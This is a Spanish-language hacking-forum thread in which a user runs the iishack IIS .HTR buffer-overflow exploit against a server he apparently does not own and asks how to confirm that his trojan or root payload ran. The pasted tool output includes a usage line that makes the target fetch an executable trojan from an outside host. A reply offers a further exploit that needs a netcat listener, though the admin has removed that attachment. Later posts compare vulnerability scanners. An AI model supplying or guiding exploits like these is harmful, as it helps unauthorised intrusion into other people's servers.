Tema destacado: Entra al canal IRC oficial de #elhacker.net
 Autor
|
Tema: Exploit Malformed HTR Request - NT4 (Leído 949 veces)
|
alb3rt0
 Desconectado
Mensajes: 217
|
Escanenado con el retina, e encontrado el siguiente bug: Description: A vulnerability in IIS involves an unchecked buffer in the filter DLLs for the following file types: .HTR, .STM and .IDC files. The .htr, .STM and .IDC extensions are used by ISAPI filters so an attacker can therefore overflow those ISAPI filters and remotely execute code as SYSTEM. Risk Level: High CVE: CVE-1999-0874 BugtraqID: http://www.securityfocus.com/bid/307/exploit/Me baje el exploit /data/vulnerabilities/exploits/iishack.exe y al usarlo me dice esto: $ ./iishack xxx.xxx.xxx 80 url ------(IIS 4.0 remote buffer overflow exploit)---------------------- (c) dark spyrit -- barns@eeye.com. http://www.eEye.com[usage: iishack <host> <port> <url>] eg - iishack www.example.com 80 www.myserver.com/thetrojan.exedo not include 'http://' before hosts! -------------------------------------------------------------------- Data sent! Puse la url de un xploit local, que te da permisos de root, pero... mi pregunta es... pone k los datos han sido enviados... pero como se ejecuta el exploit que e metido en la makina? como se que a llegado? Que alguien me ayude por favor, y gracias. |
|
|
|
|
En línea
|
|
|
|
|
Rojodos
|
Estas seguro? Ese bug es de 1999, bastante antiguo.... no se, me resulta raro. O el scanner falla, o el admin de ese server es un zoquete, o te esta tomando el pelo (como vi hace tiempo de dejar el phf como bug, para reirse de los script kiddies xDD) Te dejo un exploit a lo "script kiddie", lanzadoraisapi, de QuickBasic. Que sepas que en este que te pongo aki, hace falta el netcat escuchando en tu ordenador (lo trae el zip), y supongo que con el isshack tambien. Y por favor, no existe "root" en Windows, es Admin o Administrador. Hablemos con propiedad. Salu2 y antes de hacer una tonteria, documentate bien  [attachment borrado por el administrador] |
|
|
|
« Última modificación: 24 Enero 2005, 02:17 por Rojodos »
|
En línea
|
|
|
|
alb3rt0
Desconectado
Mensajes: 217
|
Seguramente sea cortito xD pero la verdad no me aclaro :\ e leido el leeme antes y dice que lo descomprima... y ejecuta lanzadera.exe, lo ejecuto y me sale esto:
String space corrupt in module ISAPI at address 073B:01A1
Hit any key to return to system
tambien e de decir que el netcat no lo e usado nunca, aunq primeramente dice que ejecute Lanzadera.exe
Me podrias ayudar Rojodos? Gracias
|
|
|
|
|
En línea
|
|
|
|
|
Rojodos
|
Con el Netcat no te voy a ayudar. Hay algun manual muy completo en el foro DOCUMENTACION, asi como por la web ( www.elhacker.net/Textos1.htm)En cuanto a lo demas, no sabia que estaba "mal". Mira esta web: http://www.cyruxnet.org/winbug.phpY en el campo NOMBRE, pones "isapi". Te saldra bastante informacion que te convendria leer y releer, aparte de numerosos exploits segun el Bug. salu2 |
|
|
|
« Última modificación: 24 Enero 2005, 03:18 por Rojodos »
|
En línea
|
|
|
|
alb3rt0
Desconectado
Mensajes: 217
|
El primer link no funciona, y e mirado en el foro de documentacion y parece k no hay ningun manual del netcat :S
P.D el servidor donde me aparecido ese bug, su SO no es Win, es linux :\ puede que el scanner haya fallado???, quieres que te de la ip del servidor por privado y lo compruebas?
|
|
|
|
|
En línea
|
|
|
|
|
Rojodos
|
Ya funciona, es asi: http://www.elhacker.net/Textos1.htmY en el, en "Hacking" hay un manual del Netcat, casi al principio de la pagina. Por lo demas, es imposible que te haya salido el bug del ISAPI en un sistema Linux. Es imposible, si el escanner esta bien,lo unico que se me ocurre es que un chalado ha instalado el IIS 5 en un sistema Linux, cosa que no creo que ni se pueda a no ser con una maquina virtual. Uno de los dos scaneos es erroneo, o es un Windows con el IIS (Internet Information Server, el servidor Web de M$ en sus sistemas Windows) o es un Linux y ha detectado algo que cree que es el bug ISAPI. De todas formas es mas que sospechoso que tenga un bug del año de la pera. Lo cual demuestra que el escanner es una ***** xDDDDDD. Mejor usa escanners como el NESSUS o el LANGUARD. Salu2 |
|
|
|
|
En línea
|
|
|
|
Necro
Desconectado
Mensajes: 287
]\/[37@|3r0
|
Ja ja ja, es muy extaño pero a mi tambien me paso, escaneando vulnerabilidades en servidores linux muchas veces me aparecio el bug del isapi. salu2
|
|
|
|
|
En línea
|
|
|
|
alb3rt0
Desconectado
Mensajes: 217
|
Ultima pregunta, y doy por finalizado el post xD, e leido varios posts sobre escaners de vulnerabilidades, el SSS es parecido al retina, y el retina parece k esta bien..., el N-Stealth ta bien..., y el Languard no me a gustado, o esk no e sabido usarlo, Bueno, la pregunta.... ¿ El Nessus esta para windows ? encontre una version en el emule, pero no me funcionaba.
byez!
|
|
|
|
|
En línea
|
|
|
|
|
Rojodos
|
Los mejores en Windows son el LANGUARD, EL RETINA (completo, claro), EL SSS (Shadow Security Scanner) y el NESSUS. Este ultimo es GNU y aki esta su descarga tanto para sistemas unix como win: http://www.nessus.org/download/Echa un vistazo a la documentacion que hay por ahi Que es un scanner muy muy potente, actualizado y con cantidad de plugins (y con su propio lenguaje de scripts!!!) Salu2 |
|
|
|
|
En línea
|
|
|
|
|
 |
